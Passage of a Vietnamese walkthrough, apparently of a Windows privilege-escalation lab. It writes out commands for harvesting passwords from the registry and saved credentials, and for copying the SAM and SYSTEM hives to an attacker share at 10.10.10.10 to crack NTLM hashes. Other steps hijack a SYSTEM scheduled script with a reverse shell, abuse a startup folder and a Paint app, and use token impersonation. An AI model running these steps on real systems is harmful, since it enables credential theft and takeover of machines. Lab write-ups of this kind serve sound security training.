Task 9 Passwords - Registry
Vì một số lý do, đôi khi mật khẩu không được lưu trữ trong registry. Trong trường hợp này lab này thì chắc chăn. Nhưng mình vẫn viết cách khai thác nếu trường hợp nào đó có thể khai thác được nó.
Tìm kiếm từ khóa "password" trong registry sử dụng lệnh:
reg query HKLM /f password /t REG_SZ /s
Nếu muốn tiết kiệm thời gian, hãy truy vấn khóa cụ thể này để tìm thông tin đăng nhập AutoLogon của quản trị viên:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
Trên Kali, sử dụng lệnh winexe để tạo ra một lệnh chạy với các đặc quyền của quản trị viên trên máy chủ window (cập nhật mật khẩu với mật khẩu nếu tìm thấy):
Task 10 Passwords - Saved Creds
Liệt kê mọi thông tin đăng nhập đã lưu bằng lệnh:
cmdkey /list
Lưu ý rằng thông tin xác thực cho người dùng "admin" đã được lưu. Nếu không, hãy chạy tập lệnh C:\PrivEsc\ savecred.bat để làm mới thông tin đăng nhập đã lưu.
Khởi động trình lắng nghe trên Kali và chạy tệp thực thi reverse.exe bằng chạy với thông tin đăng nhập đã lưu của người dùng admin:
Task 11 Passwords - Security Account Manager (SAM)
Các tệp SAM và SYSTEM có thể được sử dụng để trích xuất các hàm băm mật khẩu của người dùng. Máy ảo này đã lưu trữ các bản sao lưu của các tệp SAM và SYSTEM một cách không an toàn trong thư mục C:\Windows\Repair\
Chuyển các tệp SAM và SYSTEM sang máy ảo Kali để khai thác:
copy C:\Windows\Repair\SAM \\10.10.10.10\kali\
copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\
Trên Kali, tải creddump7 trên git và sử dụng nó để giải mã hàm băm từ các tệp SAM và SYSTEM:
git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM
Sau khi có được mã hash qua việc giải mã tệp tin trên mình chạy lệnh để tìm ra mật khẩu, dạng hash này là NTLM:
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt
Task 12 Passwords - Passing the Hash
Sử dụng hàm băm quản trị viên đầy đủ với pth-winexe để tạo ra một trình kết nối tới máy victim với tư cách quản trị viên mà không cần bẻ khóa mật khẩu của họ. Hãy nhớ hàm băm đầy đủ bao gồm cả băm LM và NTLM, được phân tách bằng dấu hai chấm:
Task 13 Scheduled Tasks
Dựa vào lỗi của các task lập lịch chạy tự động để leo thăng
Xem nội dung của tập lệnh C:\DevTools\CleanUp.ps1:
type C:\DevTools\CleanUp.ps1
Tập lệnh này chạy mỗi phút với quyền SYSTEM. Sử dụng accesschk.exe để kiểm tra, lưu ý rằng kihi kiểm tra cần phát hiện có khả năng chỉnh sửa tệp ps1 bằng lệnh:
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
Bắt đầu một trình lắng nghe trên Kali và sau đó chỉnh sửa tệp C:\DevTools\CleanUp.ps1 thành tệp reverse.exe mà đã tạo:
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
Đợi lịch chạy tasks thực thi sẽ kết nối tới hệ thống victim với quyền NT/SYSTEM
Task 14 Insecure GUI Apps
Liên quan đến điểm yếu của ứng dụng. Ở đây sử dụng RDP để đăng nhập vào victim:
rdesktop -u user -p password321 MACHINE_IP
Nhấp đúp vào "AdminPaint" shortcut trên Desktop của victim. Khi nó đang chạy, hãy mở trình giao diện dòng lệnh để kiểm tra phần mềm Paint có thể chạy với các đặc quyền của quản trị viên, sử dụng lênh sau để kiểm tra :
tasklist /V | findstr mspaint.exe
Khi biết có thể chạy với quyền admin - quản trị viên thực hiện trong phần mềm Paint đó, bấm "File" > "Open" . Trong hộp thoại, nhấp vào đầu vào điều hướng và dán: file://c:/windows/system32/cmd.exe, xong rồi bấm biếu tượng mũi tên ở cạnh thành công leo thang
Task 15 Startup Apps
Leo thang sử dụng tệp tự động chạy khi khởi động
Sử dụng accesschk.exe kiểm tra, lưu ý rằng nhóm BUILTIN \ Users có thể ghi tệp vào thư mục StartUp:
C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Sử dụng cscript, chạy tập lệnh C:\PrivEsc\CreateShortcut.vbs sẽ tạo một lối tắt mới cho tệp thực thi reverse.exe của trong thư mục StartUp:
cscript C:\PrivEsc\CreateShortcut.vbs
Khởi động trình lắng nghe kết nối trên Kali, sau đó đăng nhập quản trị bằng RDP và thông tin đăng nhập đã trích xuất trước đó:
rdesktop -u admin MACHINE_IP
Sau khi chạy lệnh này sẽ kích hoạt trình kết nối ngược về máy kali với quyền admin
Task 16 Token Impersonation - Rogue Potato
Task 17 Token Impersonation - PrintSpoofer
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
Thực hiện bật lắng nghe một cổng khác trên kali
Bây giờ, với trình kết nối ngược với quyền "local service" mà đã kích hoạt, hãy chạy khai thác PrintSpoofer để kích hoạt trình kết nối ngược thứ hai đang chạy với đặc quyền SYSTEM (cập nhật địa chỉ IP với IP Kali của bạn cho phù hợp):
Task 18 Privilege Escalation Scripts
Một số công cụ đã được viết để giúp tìm ra các yêu cầu leo thang đặc quyền tiềm năng trên Windows. Bốn trong số các công cụ này đã được đưa vào victim Windows VM trong thư mục C: \ PrivEsc:
winPEASany.exe
Seatbelt.exe
PowerUp.ps1
SharpUp.exe
0 Comments